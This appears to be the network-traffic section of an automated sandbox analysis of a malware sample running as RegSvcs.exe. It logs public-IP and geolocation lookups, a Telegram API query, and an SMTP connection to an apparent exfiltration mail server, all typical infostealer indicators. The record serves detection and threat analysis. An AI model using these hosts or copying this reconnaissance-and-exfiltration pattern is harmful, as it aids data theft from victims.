Jan 10, 2025 23:15:54.569232941 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:55.904792070 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:55.905271053 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:55.910113096 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.222120047 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.222373009 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.227200031 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.590668917 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.591370106 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.596129894 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.907866955 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.908512115 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.908549070 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.908561945 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.908582926 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:15:56.913355112 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.913368940 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.913502932 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:15:56.913513899 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:16:04.638989925 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:16:04.686521053 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:17:30.796137094 CET	49830	587	192.168.2.5	166.62.28.135
Jan 10, 2025 23:17:30.801182985 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:17:31.113776922 CET	587	49830	166.62.28.135	192.168.2.5
Jan 10, 2025 23:17:31.114589930 CET	49830	587	192.168.2.5	166.62.28.135

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:15:30.612071037 CET	60716	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:15:30.728070021 CET	53	60716	1.1.1.1	192.168.2.5
Jan 10, 2025 23:15:33.459048033 CET	61194	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:15:33.469614029 CET	53	61194	1.1.1.1	192.168.2.5
Jan 10, 2025 23:15:43.715281963 CET	64910	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:15:43.723038912 CET	53	64910	1.1.1.1	192.168.2.5
Jan 10, 2025 23:15:50.778779030 CET	57335	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:15:50.792500973 CET	53	57335	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:15:30.612071037 CET	192.168.2.5	1.1.1.1	0x528c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.459048033 CET	192.168.2.5	1.1.1.1	0x80aa	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:43.715281963 CET	192.168.2.5	1.1.1.1	0xc999	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:50.778779030 CET	192.168.2.5	1.1.1.1	0x9b45	Standard query (0)	mail.starofseasmarine.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:30.728070021 CET	1.1.1.1	192.168.2.5	0x528c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:33.469614029 CET	1.1.1.1	192.168.2.5	0x80aa	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:43.723038912 CET	1.1.1.1	192.168.2.5	0xc999	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:50.792500973 CET	1.1.1.1	192.168.2.5	0x9b45	No error (0)	mail.starofseasmarine.com		166.62.28.135	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:30.740289927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:32.297421932 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 426a1718ce2e1072969a00c96a42d5f8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:15:32.301292896 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:15:33.421963930 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3c092ba6ddacd493388a10f0326ba178 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:15:34.169343948 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:15:34.273488998 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2127bdbe030e010e6b30fd3465aeaceb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:34.906992912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:15:36.313076973 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b6da3ba63b0de827d07f3de59788a5ca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49730	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:36.952953100 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:15:37.435714960 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 01d6ecc5b9887a5a70b91fd8d8d48466 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49742	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:38.091998100 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:38.543535948 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ac359bf0b14f51a8bb314152395b9d5e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49749	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:39.265113115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:39.705739975 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c9713a3e159c160892c2dca76c9a93f9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49758	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:40.351279020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:40.842632055 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1ea505601349146b0cad76448288db06 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49772	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:41.468300104 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:41.978868008 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 618fe0c83a326421194dd724a4e2e9fa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49780	193.122.130.0	80	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:42.606266022 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:15:43.079130888 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7f945667d0c44287e97baee1c1e0d5f8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:34 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862123 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Ncrvr738El7%2BLgGeEO2SBemZ3VRRFDgrey%2Bz3tRHolTfRKNOULqQI3MAahAVioUbEuHs9EXYXB8oEzwZwvxMdFMsq1aE3C%2F%2FwyrJB4mgNo5o7wyb6Ow5%2FD7FgfkMcJFprN2nZoq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006c60f550f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1515&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1927392&cwnd=231&unsent_bytes=0&cid=b296c07a2d699907&ts=193&x=0"
2025-01-10 22:15:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:34 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:15:34 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862123 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFHIlMBx7BS1cOhG8bE6TIfO5GzB1l1WARZlb7YrZHFdf5IJPLT%2FwE8rtHUE7p17Su06PBDuY2CPhuH5%2BBhbDuvEpEFARgq2vF4N%2FXPdxekN1NvEoedIrpWCN7%2B7LXC59ISye5r7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006cabb650f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1503&rtt_var=580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1942781&cwnd=231&unsent_bytes=0&cid=4bef5fdd401a8a27&ts=143&x=0"
2025-01-10 22:15:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49724	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:15:36 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862126 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7xOlQf1Xl2P8l3CYiqlTQbyWHpxXxl%2Fn58m7tyWyUSrFoBIX0%2FSUUqO655NHm3YIOg%2B9haUmSgG0W9zRRqjMULktiOIB%2FTUlHbzKocO8yBTufCTEHYd487MJsed4qYgVpJsHHxih"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006d77826c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1611&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1791411&cwnd=244&unsent_bytes=0&cid=8c9e3da9a45d8a78&ts=162&x=0"
2025-01-10 22:15:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49736	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
